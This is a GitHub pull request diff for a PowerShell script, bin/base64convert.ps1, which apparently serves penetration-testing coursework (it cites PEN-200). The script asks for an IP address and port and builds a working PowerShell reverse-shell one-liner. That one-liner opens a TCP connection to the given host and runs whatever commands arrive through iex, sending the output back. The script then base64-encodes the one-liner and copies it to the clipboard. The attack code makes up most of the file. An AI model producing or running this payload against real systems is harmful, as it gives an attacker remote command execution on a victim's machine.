Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Improve base64 PowerShell script #57

Merged
merged 1 commit into from
Mar 30, 2024
Merged

Improve base64 PowerShell script #57

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
25 changes: 21 additions & 4 deletions bin/base64convert.ps1
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,10 +1,24 @@
#!/usr/bin/env pwsh

# This script generates a base64 encoded powershell reverse shell one-liner
# and copies it to the clipboard

# Cf. PEN-200, 9.3.1, Listing 32 - Encoding the oneliner in PowerShell on Linux
# https://portal.offsec.com/courses/pen-200/books-and-videos/modal/modules/common-web-application-attacks/file-upload-vulnerabilities/using-executable-files

# Prompt for IP Address
$ipAddress = Read-Host -Prompt "Enter the IP address"
Write-Host "Enter the IP address."
Write-Host "If you enter only the last two octets, `192.168` will be prepended by default."
$ipAddress = Read-Host
# $ipAddress = Read-Host -Prompt "Enter the IP address."

# Check if the input is only the last two octets and prepend "192.168" if true
$octets = $ipAddress -split '\.'
if ($octets.Count -eq 2) {
$ipAddress = "192.168." + $ipAddress
}

Write-Host "Your IP address is $ipAddress"

# Validate the IP Address
if (-not [System.Net.IPAddress]::TryParse($ipAddress, [ref]$null)) {
Expand All @@ -16,19 +30,22 @@ if (-not [System.Net.IPAddress]::TryParse($ipAddress, [ref]$null)) {
$portNumber = Read-Host -Prompt "Enter the port number"

# Validate the Port Number
if ($portNumber -notmatch '^\d+$' -or $portNumber -lt 0 -or $portNumber -gt 65535) {
if ($portNumber -notmatch '^\d+$' -or [int]$portNumber -lt 0 -or [int]$portNumber -gt 65535) {
Write-Host "Invalid port number. Please enter a port number between 0 and 65535."
exit
}

# Construct the $Text string with variable expansion
# Cf. https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3
$Text = "`$client = New-Object System.Net.Sockets.TCPClient('$ipAddress',$portNumber);`$stream = `$client.GetStream();[byte[]]`$bytes = 0..65535|%{0};while((`$i = `$stream.Read(`$bytes, 0, `$bytes.Length)) -ne 0){;`$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(`$bytes,0, `$i);`$sendback = (iex `$data 2>&1 | Out-String );`$sendback2 = `$sendback + 'PS ' + (pwd).Path + '> ';`$sendbyte = ([text.encoding]::ASCII).GetBytes(`$sendback2);`$stream.Write(`$sendbyte,0,`$sendbyte.Length);`$stream.Flush()};`$client.Close()"

$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)

$EncodedText =[Convert]::ToBase64String($Bytes)

## $EncodedText

# Output the constructed string (for verification or debugging)
Write-Host "Encoded string is: "
Write-Host $EncodedText

Write-Host "String copied to clipboard"
Invoke-Expression "echo -n '$EncodedText' | tr -d '\n' | pbcopy"
Loading